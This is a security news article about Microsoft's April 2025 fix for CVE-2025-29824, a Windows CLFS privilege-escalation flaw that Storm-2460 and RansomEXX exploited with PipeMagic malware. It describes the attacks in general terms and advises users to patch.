Microsoft has fixed a vulnerability identified in the Windows Common Log File System (CLFS). A threat actor known as Storm-2460 is actively exploiting the vulnerability using PipeMagic malware. The attacker uses the malware to exploit the vulnerability to alter privileges to spread the ransomware in the victim’s network.
Windows CLFS is a recording system for managing transactions. Vulnerability CVE-2025-29824 is a use-after-free vulnerability impacting the CLFS kernel driver. Even with a CVSS base score of 7.8 (high severity), it’s not possible for an attacker to remotely exploit the vulnerability without first breaching a system.
PipeMagic malware was initially discovered in 2022 and gives a backdoor into breached systems and acts as an entry point. The malware was used before to enable the exploitation of other vulnerabilities and was discovered being transferred through a bogus ChatGPT app, though the preliminary access vector utilized in the most recent attacks is not yet confirmed. Microsoft has noticed the threat actor utilizing the certutil utility to obtain a file having an encrypted PipeMagic payload. The threat actor used PipeMagic to exploit the vulnerability in memory through a dllhost.exe process.
An authorized attacker could successfully exploit the vulnerability to locally increase privileges to system level and enable the following stage of the attack, which is distributing the ransomware throughout the breached network. The vulnerability impacts several versions of Windows and Windows Server, though consumers who have Windows 11 version 24H2 seem not to have been attacked. Still, the vulnerability is present in that version.
Microsoft has reports stating that the RansomEXX ransomware group has exploited the vulnerability in minimal attacks on users in the IT, real estate, and financial services sectors thus far. Users in other industries may likewise be attacked. Because the vulnerability is under active exploitation, Microsoft users are instructed to implement patching of the vulnerability as well as other vulnerabilities with elevated privilege mentioned in its Patch Tuesday updates for April 2025 to strengthen their protection against ransomware attacks. HIPAA-compliant entities should also take note of this advisory if using Windows CLFS.